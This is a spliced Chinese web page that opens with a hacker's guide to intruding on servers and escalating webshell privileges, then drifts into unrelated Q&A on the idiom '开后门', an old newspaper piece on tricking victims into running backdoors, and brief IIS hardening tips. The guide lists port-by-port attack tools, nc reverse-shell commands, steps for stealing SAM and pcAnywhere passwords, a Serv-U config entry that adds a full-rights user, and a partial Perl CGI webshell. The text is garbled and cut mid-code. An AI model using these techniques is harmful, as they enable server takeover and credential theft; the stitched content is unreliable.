提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
肉鸡也称傀儡机,是指可以被黑客远程控制的机器。比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞被种植了木马,黑客可以随意 *** 纵它并利用它做任何事情。肉鸡通常被用作DDOS攻击。可以是各种系统,如windows、linux、unix等,更可以是一家公司、企业、学校甚至是政府军队的服务器。
暴库,就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地。黑客非常乐意于这种工作,为什么呢?因为黑客在得到网站数据库后,就能得到网站管理账号,对网站进行破坏与管理,黑客也能通过数据库得到网站用户的隐私信息,甚至得到服务器的最高权限。
所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库“备份/恢复”或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。1 1433端口入侵 scanportexe 查有1433的机器 SQLScanPassexe 进行字典暴破(字典是关键) 最后 SQLToolsexe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloFexe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhellozexe 入侵ip 1433 (这个是正向连接) 2 4899端口入侵 用4899过滤器exe,扫描空口令的机器 3 3899的入侵 对很早的机器,可以试试3389的溢出(win3389exexe) 对2000的机器,可以试试字典暴破。(tscrackexe) 4 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfileexe或dvup_delphiexe) 可以利用SQL进行注入。(啊D的注入软件)。 5 serv-u入侵(21端口) 对5 004及以下系统,可用溢出入侵。(serv5004exe) 对5100及以下系统,可用本地提升权限。(servlocalexe) 对serv-u的MD5加密密码,可以用字典暴破。(crackvbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dicttxt)的比较,得到密码 6 554端口 用real554exe入侵。 7 6129端口 用DameWare6129exe入侵。 8 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9 3127等端口 可以利用doom病毒开的端口,用nodoomexe入侵。(可用mydoomscanexe查)。 10 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttackexe)。 经典IPC$入侵 本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2C:\WINNT\system32\config\ 进这里下它的SAM,破解用户的密码 用到破解sam密码的软件有LC,SAMinside 3C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能跳转不,我们从这里可以获取好多有用的信息 可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转 进去后,如果有权限修改ServUDaemonini,加个用户上去,密码为空 [USER=WekweN|1] Password= HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYValues= 这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限 4c:\winnt\system32\inetsrv\data\ 就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行 5看能否跳转到如下目录 c:\php, 用phpspy c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); $_ = $ENV{QUERY_STRING}; s/%20/ /ig; s/%2f找他的漏洞 然后提权!如果这个ip有网站的话 就从网站入手(比如注入),拿到webshell后就好办了,就可以提权修改权限了。如果没网站的话,那就用流光暴破他的ftp密码,如果密码不是很复杂的话 用一般的字典 一会就可以跑出密码来,然后连接进去就行了问题一:开后门是什么意思。 开后门意思是:
“ 开后门”: 比喻当权者以权谋私,为行贿者提供的方便(之门)。 开后门比喻利用职权给予他人某些不应有的方便和利益。
典故:
南宋吉水人罗大经所撰《鹤林玉露》,在甲编卷6中有“留后门”一条,其文曰:“今若直前,万一蹉跌,退将安托要须留后门,则庶几进取有据。”这里所说的“留后门”,是指办事“留退路”的意思。
“开后门”一词,则首见于明人王一鹗的《总督四镇奏议十・举劾四镇将令疏》:“占公匠六十余名,各色营造私开后门,物议沸腾。”这里的“开后门”,是指“开方便之门”,即在房屋的两侧或后面开一些小门,以方便人的出入。
关于“后门”,据酒徒新书《家园》描述:大隋朝承袭汉制,官府衙门都是坐北朝南。如果职位高到可携带家眷上任,官员的妻儿老小通常都安置在衙门后宅。平素公务往来,客人走得全是前门,只有私交甚好的朋友或者自家晚辈才走后门入内。
今一般指通过某种关系达到自身不能达到的目的
词 性:
贬义
其它解释
(1)比喻留退路。《朱子语类》卷一○五:“除非那人做工夫大段严迫,然后劝他勿迫切。如人相杀,未曾交锋,便要引退。今未曾做工夫在,便要开后门。然亦不解迫切,只是不曾做,做著时不患其迫切。” 明 《杀狗记・王老谏主》:“[生]请问爹爹,今年田地有收么?[]种得便有收,不种没收。[丑] 孙阿伯 的说话,也是开后门的。”《绿野仙踪》第四二回:“ 如玉 坐下说道:‘我原不计论他,若计论他,也不来了。’ 苗秃子 道:‘这都是开后门的话。’”
(2)指开方便之门,给予通融。 克非 《春潮急》四:“提倡‘自由借货’,不妥吧?我仿佛记得一九五三年总路线公布后,各地在批判‘四大自由’时,就批判过。那样搞,实际上是给高利贷开后门呢!”
问题二:电脑上开后门是什么意思 每一个电脑端口就是一个后门有后门黑客就有可乘之机
电脑后门三种关法
电脑为什么会被“入侵”?首先,我们先来谈谈个人电脑入侵的原理。我们可以把一台已联网的个人电脑当做是一台几乎所有常用端口(Telnet、FTP等)都被封闭的服务器。那么从攻击手段上来讲,常用的端口查询法就失灵了。但是,由于服务器的端口最大可以有65535个,实际上常用的端口才几十个,可以看出未定义端口相当的多。这就表示我们可以采用某种方法定义出一个特殊的端口来达到入侵的目的。为了定义出这个端口,就要依靠某种程序在机器启动之前自动加载到内存,强行控制机器打开那个特殊的端口。这个程序就是“后门”程序。简单的说,我们先通过某种手段在一台个人电脑中植入一个程序,使这台机器变成一台开放性极高(用户拥有极高权限)的FTP服务器,然后就可以达到侵入的目的。
很明显,光有“后门”程序是不够的。一个好的控制工具一般分成两个部分:一个是Client,也就是客户服务程序,我们用它来控制已经打开后门的机器;另一个是Trojan/Host,也就是“后门”程序了,我们用它来开放某台机器。假设我们想控制机器A。那么我们通过一些手段来把“后门”程序传到机器A上并使其运行之,这样A就变成了一台特殊FTP的服务器,然后我们使用Client程序就可以控制A了。
当然了,后门程序如果不运行也就无法发挥作用。因此,我们再来讲讲如何“诱骗”他人使用后门程序。如果是朋友,去他机器那儿偷偷地装上就行了。但是,我们主要的对象是不熟悉的人,那就需要一些方法了。第一,我们先要和他搞好关系,然后就可以问他:“我有一个不错的程序要不要看看?”或者“给你一张我的照片怎么样?”当那个可怜的人说“行呀!给我传过来吧!”我们的第一步就达成了:)。第二步就是伪装术了。简单一些的话是直接把后门程序改名,改成一些常见的名称如ICQNuke、Readme等或者更改后缀,变成TXT或者文件格式。这样当他双击这些伪装的程序后就达到了运行的目的了。复杂一些的方法是利用Winzip的SelfExtrator软件把后门程序和一些其它的东西一起制作成一个自解压的压缩包,然后利用设定解压后自动运行Setup程序的功能来运行指定的“后门”程序。这样当他双击自解压程序后,还没等回过味来,程序就已经运行完了。对于高手来说,他们经常会编写一些程序,把“后门”藏在其中。
最后,当你知道了他的IP后,就可以利用客户服务程序去接管目标机器了。
我们已经知道了常用的“诱骗”方法,那么该如何预防后门程序的植入呢?第一,不要随便接受陌生人发来的电子邮件、文件。第二,喜欢聊天的朋友不要轻易暴露自己的IP(大部分人上网的IP都是动态分配的,因此,只要不随便暴露IP,就能较为有效地防止他人入侵)。第三,不要用Windows自带的密码记忆功能来存放你ISP的密码,这种密码保存在Windows/目录下,后缀是PWL的文件中。
《北京青年报》 2000年07月05日
问题三:开后门是什么意思 托关系,用非正常的手段达到自己的目的
问题四:电脑上开后门是什么意思啊? 木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名,顾名思义就是一种伪装潜伏的网络病毒,等待时机成熟就出来害人。
传染方式:通过电子邮件附件发出,捆绑在其他的程序中。
病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。
木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序,一旦发作,就可设置后门,定时地发送该用户的隐私到木马程序指定的地址,一般同时内置可进入该用户电脑的端口,并可任意控制此计算机,进行文件删除、拷贝、改密码等非法 *** 作。
川防范措施:用户提高警惕,不下载和运行来历不明的程序,对于不明来历的邮件附件也不要随意打开。
如何用木马病毒他人信息???
它是样的!你中了木马的服务端后,木马服务端就会在你的电脑上开端口(也就是所说的后门),等待远程的客户端的主到连接(这是主到连接式木马,但这种木马不好,如果你开防火墙了,他可以就连接不到你,因为它在连接你的时候,防火墙会向你寻问是否允许连接),还有一种是反d式木马,服务端运行后会主动去连接客户端,一但连接上了客户端(也就是制作这个木马的人的电脑),那他就能通过一些“益出”漏洞什么的,拿到你电脑的一定权限,然后再通过一些提权的方法,最终在你的电脑上建个管理账号,就能远程控制你的电脑,通过一些命令,如xcopy等或架设个小型ftp服务器把你的文件烤到自己的电脑上,或在你的电脑上看!
也有一些木马能记录你键盘输入的口令,并自动发送到指定邮箱或空间!这样你的信息就被盗走了!
说的点乱,但就是这样的!你将就看看吧!希望你能看懂!
问题五:计算机被开了后门是什么意思 计算机被开了后门就是说中了后门木马,他会计算机信息
问题六:一个风水师说我家围墙不用开后门都可以是什么意思 后门的作用有很多,所以代表的意义也就不尽相同~
以前的后门都是出现在大户人家的庭院:
开始是由下人或者仆人专走的门径,后来因为方便,所以发展和推广的很快。虽然从某种意义上看确实方便很多,但带来的问题和严重性也有很多,如下人偷约、仆人偷溜、夹带、盗贼行窃、外人入侵、密谋、私会等等往往都行此门,所以后门又被看作是灾门、败门、破财门或者小人之门~ 正因如此,后来许多大户人家的豪宅把后门(升级)改为偏门,因而减少了很多不利因素~
不知你们家为什么要开后门,也不知道你们请的风水师说不用开后门的原因。现在鱼龙混杂、唯利是图的人太多,有时间还是问清楚比较好~
问题七:形容开后门的成语 走后门
拼 音zǒu hòu mén
解 释比喻通过托情或利用职权等不正当的途径谋取通融或利益。
诗例阿袁(即陈忠远)《北兵马司新授课点即事》(二首之二)诗:人知天上云,风日每推尊。自觉导先路,何曾走后门!
文例 《坚持四项基本原则》:违反党的原则,闹派性,搞特殊化,走后门,铺张浪费,损公肥私。
事 例路遥《平凡的世界》第四卷第54章:~就~!为了给少平办成这事,她甚至故意让'关口'上的人知道她是谁的女儿!
近义词走捷径
歇后语耗子倒洞
用 法作谓语、宾语、定语;用于处事。我晕 ~~
iis60内核提权么?
首先 你该打的补丁还是要打的
首先 你网站里面的浏览权限要设置好~~不给他写入~建议参考下星外。
ShellApplication和WscriptShell这两个组件 直接果断卸载或者改名~
补充下
aspx相当于system用户 所以相当危险。
敏感文件建议弄隐秘点。比如ftp
还有终端端口可以改一下。别开43958端口了
还有如果服务器联网 注意dll被动提权。还有启动项给弄后门。
QQ 378433756
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)